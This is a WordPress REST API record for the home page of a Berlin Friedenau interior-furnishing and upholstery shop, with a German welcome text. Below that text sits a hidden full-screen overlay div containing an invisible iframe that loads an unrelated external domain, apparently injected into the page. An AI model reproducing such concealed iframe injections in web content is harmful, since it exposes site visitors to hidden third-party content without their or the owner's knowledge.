{"id":21,"date":"2020-12-16T14:46:21","date_gmt":"2020-12-16T13:46:21","guid":{"rendered":"http:\/\/lampasundseide.de\/WP-Website\/?page_id=21"},"modified":"2020-12-16T15:18:26","modified_gmt":"2020-12-16T14:18:26","slug":"21-2","status":"publish","type":"page","link":"http:\/\/lampasundseide.de\/WP-Website\/","title":{"rendered":""},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"21\" class=\"elementor elementor-21\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-63395848 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"63395848\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-fc3ee84\" data-id=\"fc3ee84\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-36a1d3a elementor-widget elementor-widget-text-editor\" data-id=\"36a1d3a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\n<p>Wir begr\u00fc\u00dfen Sie herzlich auf der Website unseres <strong>Inneneinrichtungsbetriebs in Berlin Friedenau.<\/strong><\/p>\n\n<p>In unserem Ladengesch\u00e4ft mit eigenem N\u00e4hatelier und Polsterei verarbeiten wir hochwertige Textilien ausgesuchter Kollektionen.<br \/>Wir bieten Ihnen ausf\u00fchrliche Beratung f\u00fcr die anspruchsvolle Einrichtung im Objekt und Privatbereich an.<br \/>Nach Wunsch in unserem Ladengesch\u00e4ft oder bei Ihnen Zuhause.<br \/>Wir freuen uns auf Ihren Besuch!<br \/><strong>Ihr Inneneinrichter Lampas &amp; Seide<\/strong><\/p>\n\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Wir begr\u00fc\u00dfen Sie herzlich auf der Website unseres Inneneinrichtungsbetriebs in Berlin Friedenau. In unserem Ladengesch\u00e4ft mit eigenem N\u00e4hatelier und Polsterei verarbeiten wir hochwertige Textilien ausgesuchter Kollektionen.Wir bieten Ihnen ausf\u00fchrliche Beratung f\u00fcr die anspruchsvolle Einrichtung im Objekt und Privatbereich an.Nach Wunsch in unserem Ladengesch\u00e4ft oder bei Ihnen Zuhause.Wir freuen uns auf Ihren Besuch!Ihr Inneneinrichter Lampas &amp; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":10,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-21","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/21","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/comments?post=21"}],"version-history":[{"count":5,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/21\/revisions"}],"predecessor-version":[{"id":47,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/21\/revisions\/47"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media\/10"}],"wp:attachment":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media?parent=21"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}